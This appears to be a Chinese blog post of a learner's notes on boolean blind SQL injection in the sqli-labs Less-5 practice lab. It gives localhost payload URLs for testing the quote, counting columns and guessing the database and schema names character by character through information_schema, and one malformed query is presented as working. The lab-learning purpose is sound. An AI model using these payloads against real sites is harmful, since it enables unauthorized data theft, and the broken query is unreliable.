lili’s LESS05盲注!!(小猪崽觉得这是个什么玩意儿嘤嘤嘤)

一.BOOL型-1

1.http://localhost/sqli-labs-master/Less-5/?id=1' 查看是否注入

2.http://localhost/sqli-labs-master/Less-5/?id=1'order by 3--+ 查看有多少列

出现··you  are in .......表示成功

3.http://localhost/sqli-labs-master/Less-5/?id=1'and left((select database()),1)='s'--+

(1)手工注入太麻烦可以改为burp代理,用暴力破解,逐位破解

(2)select ascii(select substr((select database()),1,1) ='s') >  100逐位猜解

http://localhost/sqli-labs-master/Less-5/?id=1'and select ascii(select substr((select database()),1,1) ='s') >  156--+(此时是没有返回值的,但是返回结果是正常)

4.MySQL登录:  进入到mysql目录后  -u 密码 -p  然后回显输入密码

二.BOOL型-2

1.通过二分法得到所有的库、红色为可变参数

http://localhost/sqli-labs-master/Less-5/?id=1'and ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) > 10--+

(╯▔皿▔)╯和up主不一样了,苦恼ing~~

这里我忽略了一个事情,这个语句的意思是,【查询information_schema数据库中schemata表的schema_name名读取一个数据(这里的limit表示从第二位数据开始读取一个)】从第一位开始截取所获得字符串第一位的长度然后转化为ascii码与后面的数据进行比较,然后一开始不知道每个人的schemata表中的数据是不一样的,所以我这里执行的时候会和up主的视频不一样

 

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值